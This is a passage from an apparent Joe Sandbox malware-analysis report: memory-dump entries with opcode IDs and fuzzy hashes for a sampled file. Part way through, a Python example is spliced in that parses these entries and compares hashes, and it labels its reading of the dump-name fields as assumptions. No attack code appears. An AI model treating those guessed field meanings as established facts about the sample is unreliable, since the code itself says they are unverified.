                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                         • Instruction ID: 6f337b6ecd433585ff37679cd861c7331a53ae306d7490c5c05fcfbe74fd3875
                                         • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                         • Instruction Fuzzy Hash: 30B1A072A083515BD308CF25C89176BF7E2EFC8310F1AC93EF89997291D774D9419A82
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                         • Instruction ID: b7d43f0ae7364d03dcb034da50a6b4ff6eb2d457a5d431769f7dc464e382843f
                                         • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                         • Instruction Fuzzy Hash: 74B17F72A083115BD308CF25C89179BF7E2EFC8310F5AC93EF89997291D774D9459A82
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                         • Instruction ID: 10984764e5c35cc72f7cd2a7d61e79de649165a359370209541b278a335408a5
                                         • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                         • Instruction Fuzzy Hash: 2BB14871E093118FD706EE3DC491265F7E1AFEA280F51C72EE895B7662EB31E8858740
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                         • Instruction ID: 14ad3b606a43a96c33bb86396d2c7439c1760e554dc879ba7e8754c40304a36f
                                         • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                         • Instruction Fuzzy Hash: 6991D7B1B042198BEF15CEA8DC80BBAB3A1AF55300F594564EF18AB382D771ED05C7A5
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                         • Instruction ID: 90e373f411e1bf9af97d3d77bf71fccddf9ac76e597e339e2b78e126a2955efb
                                         • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                         • Instruction Fuzzy Hash: 6BB14A316206099FD715CF28C48AB657BA1FF45364F29865CE89ACF2E3C335E9A1CB40
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                         • Instruction ID: 1ab1b79c48e7c9b5cad366bce4d75e772289bf670dd16081aad269a1e52f886d
                                         • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                         • Instruction Fuzzy Hash: A8C13A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E9A6CF81
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                         • Instruction ID: bcdc9f711393e8f366f1bf11331990f7c48e92a70114825622f104a39db2d913
                                         • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                         • Instruction Fuzzy Hash: 3F915731928B916AEB168B39DC427BEB7A4FFE6350F14C31AF98872491FB7185818345
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                         • Instruction ID: b70aeee8dd1165f8af0f50a9f4c736a16cb2fb34b669ba58481396072824c3fd
                                         • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                         • Instruction Fuzzy Hash: 2AA13F72A00A19CBEB19CF55DCC1AAEBBB1FB54324F14C22AD51AE77A0D334A944CF50
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: the same 15 dumps of this module as listed in full under the first entry above
                                         • Joe Sandbox IDA Plugin snapshot file: hcaresult_0_2_180000_file.jbxd
                                         Similarity
                                         • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                         • Instruction ID: d3f00827e2a6ffecab6d5bc1186f897b18b4fbedba9089d906236ff650fdb2f8
                                         • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                         • Instruction Fuzzy Hash: 7DA16C72A083519BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E8419A82
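The entries above are easier to work with as structured records than as the rendered listing. The following Python is an added example written for this page, not code from the Joe Sandbox report or from Joe Security: it parses three of the entries above (copied from this section, with the repeated Associated lists cut to one dump each and the last entry cut off before its hashes, as it is at the end of this section), decodes the .sdmp dump names, and compares two of the instruction fuzzy hashes. The meaning assigned to the .sdmp name fields (region address, Win32 PAGE_* protection value, memory type) is an assumption made for this example, and nibble_distance() is a crude positional comparison, not Joe Sandbox's own similarity metric.

```python
"""Parse Joe Sandbox "Memory Dump Source" entries into structured records.

Added example for this report page, not code from Joe Sandbox or Joe Security.
The meaning given to the .sdmp name fields (region address, Win32 PAGE_*
protection, memory type) is an ASSUMPTION made for illustration, and
nibble_distance() is a crude positional comparison, not Joe Sandbox's metric.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: three entries copied from this report section; Associated
# lists cut to one dump each, last entry cut off before its hashes (as on the page).
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
• Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
• Instruction ID: 6f337b6ecd433585ff37679cd861c7331a53ae306d7490c5c05fcfbe74fd3875
• Instruction Fuzzy Hash: 30B1A072A083515BD308CF25C89176BF7E2EFC8310F1AC93EF89997291D774D9419A82
Memory Dump Source
• Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
• Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
• Instruction ID: b7d43f0ae7364d03dcb034da50a6b4ff6eb2d457a5d431769f7dc464e382843f
• Instruction Fuzzy Hash: 74B17F72A083115BD308CF25C89179BF7E2EFC8310F5AC93EF89997291D774D9459A82
Memory Dump Source
• Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
"""

# Assumed field layout of a dump name: proc.phase.dumpid.address.protection.f6.memtype.f8.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<addr>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)
SOURCE_RE = re.compile(r"(\S+\.sdmp), Offset: ([0-9a-f]+), based on PE: (true|false)", re.I)
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

@dataclass
class DumpRegion:
    name: str
    address: int      # assumed: start of the dumped region
    protection: int   # assumed: Win32 PAGE_* value at dump time

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, hex(self.protection))

def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(name, int(m["addr"], 16), int(m["prot"], 16))

@dataclass
class FunctionEntry:
    source: DumpRegion    # region the function was disassembled from
    module_base: int      # the "Offset:" value, i.e. the module's load address
    associated: List[DumpRegion] = field(default_factory=list)
    attrs: Dict[str, str] = field(default_factory=dict)  # Opcode ID, Instruction ID, hashes

    @property
    def rva(self) -> int:  # offset of the source region inside the module
        return self.source.address - self.module_base

    @property
    def instruction_fuzzy(self) -> Optional[str]:  # None when the entry is cut off
        return self.attrs.get("Instruction Fuzzy Hash")

def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        key, _, value = raw.strip().lstrip("•").strip().partition(":")
        key, value = key.strip(), value.strip()
        if value.endswith("Download File"):  # link text left over from the HTML report
            value = value[: -len("Download File")].strip()
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if not m:
                raise ValueError(f"unexpected Source File line: {value!r}")
            current = FunctionEntry(parse_sdmp_name(m[1]), int(m[2], 16))
            entries.append(current)
        elif current is None or not value:
            continue  # "Memory Dump Source" header, empty field, or text before the first entry
        elif key == "Associated":
            current.associated.append(parse_sdmp_name(value))
        else:
            current.attrs[key] = value
    return entries

def nibble_distance(a: str, b: str) -> int:
    """Hex positions at which two equal-length fuzzy hashes differ (crude, positional)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length cannot be compared this way")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))

def rwx_functions(entries: List[FunctionEntry]) -> List[FunctionEntry]:
    """Entries disassembled from a region whose (assumed) protection is PAGE_EXECUTE_READWRITE."""
    return [e for e in entries if e.source.protection == 0x40]
```

Calling parse_entries(SAMPLE) yields three records: two from the region at 0x1AC000 (RVA 0x2C000 in the module loaded at 0x180000) and one from 0x46A000 (RVA 0x2EA000), all with protection value 0x40, which under the assumption above is PAGE_EXECUTE_READWRITE, the writable-and-executable memory an analyst looks at first for unpacked code. The two complete instruction fuzzy hashes differ in 8 of 70 hex positions, and the truncated last entry parses to a record whose instruction_fuzzy is None instead of raising.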
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b34e25873bf212199ecf3abcf362c90f3566bc6e1fa93ded90464ba3ab583ebe
                                        • Instruction ID: e9f01bcd1397c6eecb97a6b39cc88f8dd24b4682c3ef79f9f0e0564ec84674cd
                                        • Opcode Fuzzy Hash: b34e25873bf212199ecf3abcf362c90f3566bc6e1fa93ded90464ba3ab583ebe
                                        • Instruction Fuzzy Hash: 667139B39093189BE3006E2DDC843BAFBD9EF91721F1A4A3DDAC483B44E97559458683
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35f0e7901638e70d6f1e2531777482baa7c28ab5a0ff7636d905c7735fbf8e15
                                        • Instruction ID: 1c63ff04c224c1ffe22912856a53738805fa94328e1ee23ebb80df266d034dc1
                                        • Opcode Fuzzy Hash: 35f0e7901638e70d6f1e2531777482baa7c28ab5a0ff7636d905c7735fbf8e15
                                        • Instruction Fuzzy Hash: C55198B351C605EFD2493BA8AC05276B6D7EB86320F35463EE593D6344E9314C039A87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d96b1f473cc85eb1fb07381f2239a9ad80ee4d47bd05df3742d79c3ba472127
                                        • Instruction ID: 2801ee8ad1269fd6caa20fb993883b2ea20543913644451578c2b7f35f25e9e8
                                        • Opcode Fuzzy Hash: 9d96b1f473cc85eb1fb07381f2239a9ad80ee4d47bd05df3742d79c3ba472127
                                        • Instruction Fuzzy Hash: 9C41D1F3E182149BF3146A1DEC4576AB7D5EB94720F1B043DDB88D3780E97A681482C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37aabefa117d2770b1f156b5286995c1775ab5a4a12b7bc3d938289620e90615
                                        • Instruction ID: ff27664ed85a302f1c75be1a2af213398d28c9c0598b2ca164669c5423250660
                                        • Opcode Fuzzy Hash: 37aabefa117d2770b1f156b5286995c1775ab5a4a12b7bc3d938289620e90615
                                        • Instruction Fuzzy Hash: F84125F3A087108BF348AE29DC8536AF7D6DFE8311F0A853D97C487788E97958018786
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc7a7c0b1a66dbffeab2f5460872f94f0b0300f5eb326d05bd9ab6fd79ef8888
                                        • Instruction ID: ff604ee6c36acd33cc7c8df6cb2748cf02f65e85d74271c5c6ff36ffc8bb25c0
                                        • Opcode Fuzzy Hash: fc7a7c0b1a66dbffeab2f5460872f94f0b0300f5eb326d05bd9ab6fd79ef8888
                                        • Instruction Fuzzy Hash: 34416EF3B0420857F3005D7EEC487B7BB96DBD0320F2A8539D694CB784E879990A4290
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7822bbe82bf026576dc4b39fbd1d618d32cb9bf7bc3dc08ed67db745b86aa81f
                                        • Instruction ID: 457876a16d693c6535cd6438db12a6a2b8d222384a3cc627c7e08c99e75eb150
                                        • Opcode Fuzzy Hash: 7822bbe82bf026576dc4b39fbd1d618d32cb9bf7bc3dc08ed67db745b86aa81f
                                        • Instruction Fuzzy Hash: E34129F3A082008FE3546E69DC8577AF6E5EBD5310F1A853DD7C8C7784E93888068796
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: d21e724791e10dfcd2d1d18d7f1ac9c56c585cc71e50b4cef389cf8b73d0a3db
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: 1D515C62E09BD989C7058B7544502EEBFB25FE6204F1E839EC4981F383C3759689D3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
